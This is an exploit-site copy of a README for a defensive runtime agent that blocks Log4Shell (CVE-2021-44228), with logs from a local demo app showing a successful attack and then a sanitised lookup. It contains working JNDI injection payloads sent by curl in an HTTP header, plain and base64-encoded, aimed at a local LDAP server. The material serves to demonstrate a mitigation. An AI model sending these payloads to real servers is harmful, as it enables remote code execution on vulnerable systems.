Exploit for Uncontrolled Resource Consumption in Apache Log4J CVE-2021-44228

Name: Exploit for Uncontrolled Resource Consumption in Apache Log4J CVE-2021-44228
Rating: 5 (419 reviews)
2021-12-21 | CVSS 9.3
## https://sploitus.com/exploit?id=F594470D-2599-5B2E-B317-C9720581C07D
# RASP CVE-2021-44228(Log4Shell)

 RASP for CVE-2021-44228 (**for educational purposes only**).

## Execution check environment

- Java (AdoptOpenJDK 11.0.8)

## Check flow

### Disable RASP

```
==================== Run Application ====================
$ java -jar build/libs/web_application-0.0.1-SNAPSHOT.jar
(...snip...)
2021-12-21 20:38:15.353  INFO 44920 --- [           main] o.s.b.w.e.t.TomcatWebServer              : Tomcat started on port(s): 8080 (http) with context path ''
2021-12-21 20:38:15.363  INFO 44920 --- [           main] c.e.d.DemoApplication                    : Started DemoApplication in 1.896 seconds (JVM running for 2.912)

==================== Send payload ====================
$ curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/a}'

==================== Application logs ====================
2021-12-21 20:38:15.353  INFO 44920 --- [           main] o.s.b.w.e.t.TomcatWebServer              : Tomcat started on port(s): 8080 (http) with context path ''
2021-12-21 20:38:15.363  INFO 44920 --- [           main] c.e.d.DemoApplication                    : Started DemoApplication in 1.896 seconds (JVM running for 2.912)
12月 21, 2021 8:39:07 午後 org.apache.catalina.core.ApplicationContext log
情報: Initializing Spring DispatcherServlet 'dispatcherServlet'
2021-12-21 20:39:07.962  INFO 45042 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet                : Initializing Servlet 'dispatcherServlet'
2021-12-21 20:39:07.964  INFO 45042 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet                : Completed initialization in 1 ms
-------HACKED------　⭐️ Success Attack ⭐️
2021-12-21 20:39:07.995  INFO 45042 --- [nio-8080-exec-1] MainController    
```

### Enable RASP

```
==================== Run Application ====================
$ java -javaagent:./lib/cve_2021_44228_rasp-jar-with-dependencies.jar -jar build/libs/web_application-0.0.1-SNAPSHOT.jar
Loading CVE-2021-44228 RASP ⭐️　Loaded RASP　⭐️
(...snip...)
2021-12-21 20:51:12.335  INFO 45330 --- [           main] o.s.b.w.e.t.TomcatWebServer              : Tomcat started on port(s): 8080 (http) with context path ''
2021-12-21 20:51:12.347  INFO 45330 --- [           main] c.e.d.DemoApplication                    : Started DemoApplication in 2.02 seconds (JVM running for 3.163)

==================== Send payload ====================
$ curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/a}'

==================== Application logs ====================
12月 21, 2021 8:51:59 午後 org.apache.catalina.core.ApplicationContext log
情報: Initializing Spring DispatcherServlet 'dispatcherServlet'
2021-12-21 20:51:59.158  INFO 45330 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet                : Initializing Servlet 'dispatcherServlet'
2021-12-21 20:51:59.159  INFO 45330 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet                : Completed initialization in 1 ms
Before : ldap://127.0.0.1:1389/a
JndiLookupTransformer#sanitizing
After : ldap:xx127.0.0.1:1389xa ⭐️　"javax.naming.CommunicationException" occurred.　⭐️
2021-12-21 20:51:59,226 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap:xx127.0.0.1:1389xa]. javax.naming.CommunicationException: localhost:389 [Root exception is java.net.ConnectException: Connection refused (Connection refused)]
    at java.naming/com.sun.jndi.ldap.Connection.<init>(Connection.java:237)
    at java.naming/com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137)
    at java.naming/com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1610)
    at java.naming/com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2751)
    at java.naming/com.sun.jndi.ldap.LdapCtx.<init>(LdapCtx.java:319)
    at java.naming/com.sun.jndi.url.ldap.ldapURLContextFactory.getUsingURLIgnoreRootDN(ldapURLContextFactory.java:60)
    at java.naming/com.sun.jndi.url.ldap.ldapURLContext.getRootURLContext(ldapURLContext.java:61)
    at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:204)
    at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
    at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)
    at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)
    at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)
(...snip...)
2021-12-21 20:51:59.191  INFO 45330 --- [nio-8080-exec-1] MainController                           : Received a request for API version ${jndi:ldap://127.0.0.1:1389/a}
```

## Build & Using

### Build RASP(JavaAgent) in cve_2021_44228_rasp

```
$ mvn clean package
$ ls target/cve_2021_44228_rasp-jar-with-dependencies.jar
$ mv target/cve_2021_44228_rasp-jar-with-dependencies.jar ../web_application/lib
```

### Run Vulnerability Application in web_application

```
$ ./gradlew bootJar
$ ls build/libs/web_application-0.0.1-SNAPSHOT.jar
$ java -javaagent:./lib/cve_2021_44228_rasp-jar-with-dependencies.jar -jar build/libs/web_application-0.0.1-SNAPSHOT.jar
```

```
# Attack
$ curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/a}'

# Base64 Attack
$ curl 127.0.0.1:8080/base64 -H 'X-Api-Version: JHtqbmRpOmxkYXA6Ly8xMjcuMC4wLjE6MTM4OS9hfQ=='
```